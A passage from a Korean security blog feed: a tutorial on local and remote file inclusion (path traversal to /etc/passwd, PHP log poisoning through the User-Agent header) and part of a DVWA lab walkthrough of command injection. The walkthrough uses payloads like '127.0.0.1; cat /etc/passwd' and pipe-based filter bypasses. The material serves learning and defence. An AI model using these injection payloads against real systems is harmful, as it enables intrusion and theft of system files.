&lt;p data-ke-size=&quot;size16&quot;&gt;서버의 중요한 파일(`/etc/passwd`, 로그파일, 소스코드 등)을 읽거나 악성스크립트를 실행시키기 위해 사용된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  예시 : `http://example.com/index.php?page=../../../../../../../etc/passwd`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  URL에 파일 경로를 포함해서 공격을 하면, 서버에서 `/etc/passwd` 파일을 읽어서 출력하도록 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;만약, 서버 디렉토리 내부에 Web Shell이 있다면, File Inclusion 취약점이 있는 페이지를 통해서 Web Shell에 접근할 수도 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;다른 공격으론, HTTP-Agent에 `&amp;lt;?php passthru('command');?&amp;gt;` 라는 php코드를 넣어 패킷을 보내면, Apache server의 error.log파일(error.log.php)에 공격 코드가 삽입되고, LFI 공격으로 해당 로그파일을 읽어와 명령어 실행이 가능해진다.&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;font-family: 'IBM Plex Sans KR'; sans-serif; box-sizing: border-box; margin: 10px; line-height: 1.5em; background-color: #424242; padding: 20px; color: #ffffff; border-radius: 20px;&quot;&gt;&lt;span&gt;&lt;b&gt;HTTP Message (Request)&lt;br /&gt;GET /../error.log HTTP/1.0&lt;br /&gt;User-Agent : &amp;lt;?php passthru('command');?&amp;gt;&lt;br /&gt;Accept: text/html; */*&lt;br /&gt;Referer: http://www.example.com/index.php&lt;br /&gt;Host:&amp;nbsp; www.example.com&amp;nbsp;&lt;/b&gt;&lt;/span&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;메시지 본문&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;3. RFI (Remote File Inclusion)&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;LFI와 동일한 환경에서 발생될 수 있으며, 차이점은 원격지 파일을 삽입하여 내부 파일처럼 인식시킨다는 점이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;RFI는 공격자가 원격 서버에 호스팅된 악성 파일을 포함하여 애플리케이션 내에서 실행하도록 유도하여 웹 어플리케이션을 손상시키거나 서버를 제어하기 위한 목적으로 사용된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  예시 :&amp;nbsp; `http://example.com/index.php?page=악성URL`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  URL에 파일 경로를 포함해서 공격을 하면, 서버에서 악성파일을 실행하도록 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;✔ 조건 : php설정 파일인 `php.ini`에서 `allow_url_fopen=On` 및 `allow_url_include=On`으로 설정되어 있어야 원격지 사이트 호출이 가능하다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;4. 발생 원인&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;;&quot; data-ke-size=&quot;size16&quot;&gt;  사용자의 입력에 대한 검증 부족&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;  경로 필터링 미비 &lt;b&gt;  &lt;/b&gt;경로탐색(`../`)이 제대로 필터링되지 않음.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;  동적 파일 포함   PHP의 `include`나 `require` 같은 동적 파일 포함 함수에 사용자 입력을 직접으로 사용&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;5. 방지법&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt; &amp;nbsp; 입력값 검증&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  사용자 입력값에서 경로탐색(`../`)이나 원격 URL 필터링,&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  허용된 파일만 로드하도록 화이트리스트 적용&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt; 파일 경로 고정   포함할 파일 경로를 특정 디렉터리로 제한&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;PHP 설정 변경   `allow_url_fopen=Off` 및 `allow_url_include=Off`&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1737171890180&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;WSTG - Latest | OWASP Foundation&quot; data-og-description=&quot;WSTG - Latest on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.&quot; data-og-host=&quot;owasp.org&quot; data-og-source-url=&quot;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion&quot; data-og-url=&quot;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/edZGoS/hyX0uo4BXC/SkaaWlWWMuZsvLtoD7KVY0/img.png?width=64&amp;amp;height=64&amp;amp;face=0_0_64_64&quot;&gt;&lt;a href=&quot;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/edZGoS/hyX0uo4BXC/SkaaWlWWMuZsvLtoD7KVY0/img.png?width=64&amp;amp;height=64&amp;amp;face=0_0_64_64');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;WSTG - Latest | OWASP Foundation&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;WSTG - Latest on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;owasp.org&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>웹 보안/웹 해킹</category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/660</guid>
      <comments>https://jennana.tistory.com/660#entry660comment</comments>
      <pubDate>Sun, 19 Jan 2025 14:30:47 +0900</pubDate>
    </item>
    <item>
      <title>[DVWA 실습] Command Injection</title>
      <link>https://jennana.tistory.com/659</link>
      <description>&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;[DVWA&amp;nbsp;실습]&amp;nbsp;Command&amp;nbsp;Injection&lt;/b&gt;&lt;/h2&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;✔ 공격 대상 :&amp;nbsp;&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;684&quot; data-origin-height=&quot;145&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cokFDH/btsLQ49fBwX/kUCF4K5okk3wiVRaaZZf60/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cokFDH/btsLQ49fBwX/kUCF4K5okk3wiVRaaZZf60/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cokFDH/btsLQ49fBwX/kUCF4K5okk3wiVRaaZZf60/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcokFDH%2FbtsLQ49fBwX%2FkUCF4K5okk3wiVRaaZZf60%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;630&quot; height=&quot;134&quot; data-origin-width=&quot;684&quot; data-origin-height=&quot;145&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  입력창은 IP 주소를 넣어 ping을 확인하는데, 이곳을 통해서 다른 시스템 명령어가 실행되도록 하면 된다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;  1. Low Level&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;우선, IP주소를 넣으면 아래와 같이 뜬다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;691&quot; data-origin-height=&quot;302&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cHjCKS/btsLO8FDAwm/YLH3AeFxVP0P5ILVMkDTFk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cHjCKS/btsLO8FDAwm/YLH3AeFxVP0P5ILVMkDTFk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cHjCKS/btsLO8FDAwm/YLH3AeFxVP0P5ILVMkDTFk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcHjCKS%2FbtsLO8FDAwm%2FYLH3AeFxVP0P5ILVMkDTFk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;630&quot; height=&quot;275&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;691&quot; data-origin-height=&quot;302&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 검색창에 시스템 명령어를 넣어 보았다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1) `ls`&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;635&quot; data-origin-height=&quot;143&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bqiIIY/btsLPQqRIb2/S3FerC1vCZqshRHYJLde51/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bqiIIY/btsLPQqRIb2/S3FerC1vCZqshRHYJLde51/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bqiIIY/btsLPQqRIb2/S3FerC1vCZqshRHYJLde51/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbqiIIY%2FbtsLPQqRIb2%2FS3FerC1vCZqshRHYJLde51%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;630&quot; height=&quot;142&quot; data-origin-width=&quot;635&quot; data-origin-height=&quot;143&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  아무것도 뜨지 않는다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2) `127.0.0.1; ls`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;IP 주소 뒤에 `;`을 붙이고 시스템 명령어(`ls`)를 입력하였다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;616&quot; data-origin-height=&quot;349&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bjCmZO/btsLPO0Rqxu/nFN9XknbYIC3ZyiKhQhftK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bjCmZO/btsLPO0Rqxu/nFN9XknbYIC3ZyiKhQhftK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bjCmZO/btsLPO0Rqxu/nFN9XknbYIC3ZyiKhQhftK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbjCmZO%2FbtsLPO0Rqxu%2FnFN9XknbYIC3ZyiKhQhftK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;630&quot; height=&quot;357&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;616&quot; data-origin-height=&quot;349&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  `ping 127.0.0.1` 결과와 함께 `ls` 결과가 나온다.&lt;b&gt;(성공 )&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3) `127.0.0.1; cat /etc/passwd`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;추가적으로 계정정보도 확인해 보았다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;691&quot; data-origin-height=&quot;527&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bPKKZq/btsLQT7ZryC/6AYhV7FY0slE4OFDLkVWC0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bPKKZq/btsLQT7ZryC/6AYhV7FY0slE4OFDLkVWC0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bPKKZq/btsLQT7ZryC/6AYhV7FY0slE4OFDLkVWC0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbPKKZq%2FbtsLQT7ZryC%2F6AYhV7FY0slE4OFDLkVWC0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;630&quot; height=&quot;480&quot; data-origin-width=&quot;691&quot; data-origin-height=&quot;527&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  `ping 127.0.0.1` 결과와 함께&amp;nbsp; `cat /etc/passwd` 결과도 나온다. &lt;b&gt;(성공 )&lt;/b&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;✔ 소스 코드 :&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;468&quot; data-origin-height=&quot;410&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dL2hg5/btsLQugzkDN/gvBgcT9K6jPuX2f8JUNBOk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dL2hg5/btsLQugzkDN/gvBgcT9K6jPuX2f8JUNBOk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dL2hg5/btsLQugzkDN/gvBgcT9K6jPuX2f8JUNBOk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdL2hg5%2FbtsLQugzkDN%2FgvBgcT9K6jPuX2f8JUNBOk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;468&quot; height=&quot;410&quot; data-origin-width=&quot;468&quot; data-origin-height=&quot;410&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  IP 주소를 입력하면 `ping` 명령을 실행하는데, 입력값에 대해서 검증이 없으므로 세미콜론(`;`)을 입력하고 다른 명령어를 추가로 전송할 수 있다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;  2. Medium Level&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;우선, IP주소를 넣으면 아래와 같이 뜬다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;638&quot; data-origin-height=&quot;300&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/deEOkm/btsLPPrYmAC/xujsTFfOii2xk9VCvkJedk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/deEOkm/btsLPPrYmAC/xujsTFfOii2xk9VCvkJedk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/deEOkm/btsLPPrYmAC/xujsTFfOii2xk9VCvkJedk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdeEOkm%2FbtsLPPrYmAC%2FxujsTFfOii2xk9VCvkJedk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;630&quot; height=&quot;296&quot; data-origin-width=&quot;638&quot; data-origin-height=&quot;300&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1) `127.0.0.1; ls`&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;642&quot; data-origin-height=&quot;150&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cc9oGe/btsLPsjtZMC/oUu3MdbpcIaP1LYWi9K7ek/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cc9oGe/btsLPsjtZMC/oUu3MdbpcIaP1LYWi9K7ek/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cc9oGe/btsLPsjtZMC/oUu3MdbpcIaP1LYWi9K7ek/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcc9oGe%2FbtsLPsjtZMC%2FoUu3MdbpcIaP1LYWi9K7ek%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;630&quot; height=&quot;147&quot; data-origin-width=&quot;642&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  Low level에서는 `ls`명령어가 실행 되었으나, medium level에서는 실행이 되지 않는다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;✔ 소스 코드 확인&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;763&quot; data-origin-height=&quot;555&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bBqPZT/btsLP8kxrXL/18NGXMCFKSwAjoElDXcev1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bBqPZT/btsLP8kxrXL/18NGXMCFKSwAjoElDXcev1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bBqPZT/btsLP8kxrXL/18NGXMCFKSwAjoElDXcev1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbBqPZT%2FbtsLP8kxrXL%2F18NGXMCFKSwAjoElDXcev1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;763&quot; height=&quot;555&quot; data-origin-width=&quot;763&quot; data-origin-height=&quot;555&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  소스 코드를 확인해보면, `&amp;amp;&amp;amp;`와 `;`가 빈칸으로 필터링되는 것을 알 수 있다. 그렇기 때문에, 두 가지 경우를 우회하여 시스템 명령어를 실행할 수 있는 방법을 알아내야 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;`cmd1| cmd2` : (파이프) `|`를 사용하면 cmd1의 출력을 cmd2의 입력으로 전달합니다. cmd1이 성공하거나 실패하더라도 cmd2는 실행됩니다.&lt;br /&gt;`cmd1; cmd2` : (순차실행) `;`를 사용하면&amp;nbsp;&amp;nbsp;cmd1의 실행이 끝난 후, 성공여부와 상관없이 cmd2가 실행됩니다.&lt;br /&gt;`cmd1|| cmd2` : (OR 논리연산) cmd1 실행이 실패할 경우에만 cmd2가 실행됩니다.&lt;br /&gt;`cmd1&amp;amp;&amp;amp;cmd2` : (AND 논리연산) cmd1 실행이 성공할 경우에만 cmd2가 실행됩니다.&lt;br /&gt;`$(cmd)` : (명령어 치환) cmd의 실행 결과를 캡처하여 다른 명령어의 일부로 사용합니다. 예를 들어 `echo $(whoami)` 에서 `whoami` 명령어의 출력 결과를 포함하여 `사용자이름`을 출력합니다.&lt;br /&gt;`cmd` : 특정 명령어를 실행하는 데 사용됩니다.&lt;br /&gt;`&amp;gt;(cmd)`: (프로세스 치환-출력) `&amp;gt;(ls)` 명령어의 출력을 임시 파일이나 스트림으로 만들어 다른 명령어로 보냅니다. 파일을 필요로 하는 명령어와 함께 사용됩니다.&lt;br /&gt;`&amp;lt;(cmd)`: (프로세스 치환-입력) `&amp;lt;(ls)` 명령어의 출력을 임시 파일이나 스트림으로 만들어 다른 명령어가 입력으로 사용합니다.&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2) `127.0.0.1| ls`&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;638&quot; data-origin-height=&quot;212&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/be2Kft/btsLQrxmOqA/H0NCZVEO8chANPm1dOUIz0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/be2Kft/btsLQrxmOqA/H0NCZVEO8chANPm1dOUIz0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/be2Kft/btsLQrxmOqA/H0NCZVEO8chANPm1dOUIz0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbe2Kft%2FbtsLQrxmOqA%2FH0NCZVEO8chANPm1dOUIz0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;550&quot; height=&quot;183&quot; data-origin-width=&quot;638&quot; data-origin-height=&quot;212&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  `;`(세미콜론) 대신에 `|`(파이프)를 입력했는데&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;b&gt;성공&lt;/b&gt;하였다.&lt;b&gt; &lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;`cmd1 | cmd2`이면, cmd1의 출력을 cmd2의 입력으로 전달한다. cmd1이 성공하거나 실패하더라도 cmd2는 실행된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3) `127.0.0.1 &amp;amp; ls`&lt;/p&gt;
